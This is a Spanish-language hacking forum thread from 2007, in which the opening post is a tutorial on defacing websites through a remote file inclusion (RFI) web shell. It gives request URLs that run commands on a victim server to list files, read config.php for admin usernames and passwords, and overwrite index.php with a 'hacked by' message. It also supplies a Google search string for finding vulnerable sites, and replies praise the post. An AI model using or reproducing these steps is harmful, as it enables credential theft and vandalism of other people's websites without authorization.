| | ||||||
 |
Complemento, Deface RFI |
 |
| | Herramientas | Buscar en Tema | Desplegado |
26-may-2007, 00:05
| ||||
| ||||
  Complemento, Deface RFI Este es un ejemplo para los q ya han entrado al equipo de la victima y ya tienen privilegios de administrador. La vulnerabilidad es de la siguiente forma... w ww.Victima.com/index_vulnerable?vulnerabilidad=tushell?&cmd=coman doausar Quieres modificar algo? Te fijas si tienes permisos algunas shells te dicen esto: write permission: YES es que tienes permisos de escritura y claro si no tienes dice write permission: NO tendras permisos y no podras hacer nada xisten formas para tener los permisos solo me voy a lo breve Si llegas a tener permisos haz esto: w ww.Victima.com/index_vulnerable?vulnerabilidad=tushell?&cmd=Ls Te saldra esto : admin/ admin.php classes/ components/ config.php* <--------- aka esta el USER y el pass data/ docs/ editor/ images/ includes/ index.php <-------------- Index.php index2.php installations/ kaotic.pl* lang/ mainbody.php modules/ pathway.php root.htm spy.php* templates/ uploadfiles/ xD.htm xx.htm* zina si te sale el config.php has esto : w ww.Victima.com/index_vulnerable?vulnerabilidad=tushell?&cmd=catco nfig.php y te saldra los usuarios y pass y si nada mas kieres Defacear el index haz esto : w ww.victima.com/index_vulnerable?vulnerabilidad=tushell?&cmd=echoH ACKEDBYTuNICK>index.php Buscar victimas Este es quisas el paso mas largo y tedioso ya que cada vez son menos las paginas vulnerables a este ataque (aunque siempre hay otras vulnerablidades que se pueden explotar Para empezar ponemos en google: "allintext: powered by form mail 2.2" (sin comillas) y le damos a buscar. Nos aparecen muchas webs para probar, generalmente las primeras paginas que aparcen no son vulnerables pero nunca esta de mas probar. Busque hoy en google y me salieron 1.050.000 paginas vulnerables  A probar.. 
__________________ Solo hay 2 cosas infinitas, el Universo y la estupides humana... Y no estoy seguro del Universo - Albert Einstein  LaserDance UnderGround Security Team Última edición por LaserDance; 26-may-2007 a las 01:19.  |
| Recomendamos |
|
26-may-2007, 00:46
| ||||
| ||||
 Hay que saber que las primeras paginas no nos permiten entrar, pero hay algunas exepciones...
__________________ |
|
26-may-2007, 01:51
| ||||
| ||||
| muy buen aporte lanserr.. sigue asi xD
__________________  *El único error de la vida fue el no hacer nada por miedo a errar. *La verdad está en tus ojos y la mentira en tu silencio. *El miedo a preguntar es el fruto del desconocimiento. |
|
| Etiquetas |
| complemento, deface, rfi |
« Tema Anterior
|
Próximo Tema »
| Herramientas | Buscar en Tema |
| Desplegado | |
Mode Lineal
| |
Temas Similares | ||||
| Tema | Autor | Foro | Respuestas | Último mensaje |
| Averigua si es happy hours en rapidshare con este complemento!! | Sanlegas | Descargar WareZ | 6 | 13-jul-2008 01:53 |
| Pregunta abierta: ayudenme sobre complemento de firefox ? | El Experto | Problemas con tu PC | 0 | 07-jul-2008 05:10 |
| Pregunta abierta: ¿Existe el complemento ideal? | El Experto | Sexualidad | 0 | 22-jun-2008 17:40 |
| Pregunta abierta: funcionamiento del complemento de Firefox Clipmarks???? | El Experto | Problemas con tu PC | 0 | 19-jun-2008 02:00 |
| Sección de Deface | LaserDance | Hacking | 3 | 08-feb-2008 20:49 |
Desarrollado por: vBulletin® Versión 3.7.2
Derechos de Autor ©2000 - 2008, Jelsoft Enterprises Ltd.
Derechos de Autor ©2000 - 2008, Jelsoft Enterprises Ltd.